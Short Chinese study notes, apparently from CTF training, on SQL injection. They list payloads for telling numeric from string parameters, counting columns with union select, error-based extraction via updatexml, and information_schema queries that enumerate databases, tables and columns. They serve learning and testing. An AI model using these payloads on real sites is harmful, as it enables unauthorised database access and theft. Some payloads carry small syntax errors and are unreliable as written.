整数型字注入:
1.判断数字型还是字符型(加引号)id=‘1’ or ‘1’=‘1’
不是的话单引号不会完全闭合
2.查字段数 union select1,2,3 order by
3.查询数据库 表 字段hackbar-load
报错注入:
select updatexml(1,concat(0x7e,(select version())0x7e),1)
布尔盲注
时间盲注
select schema_name from information_schema.schemata
select group_concat(table_name)from information_schema.tables where table_schema=' '
select group_concat(column_name)from information_schema.columns where table_schema=' ' and table_name=' '
(图片来源河北师范大学sourcecode战队)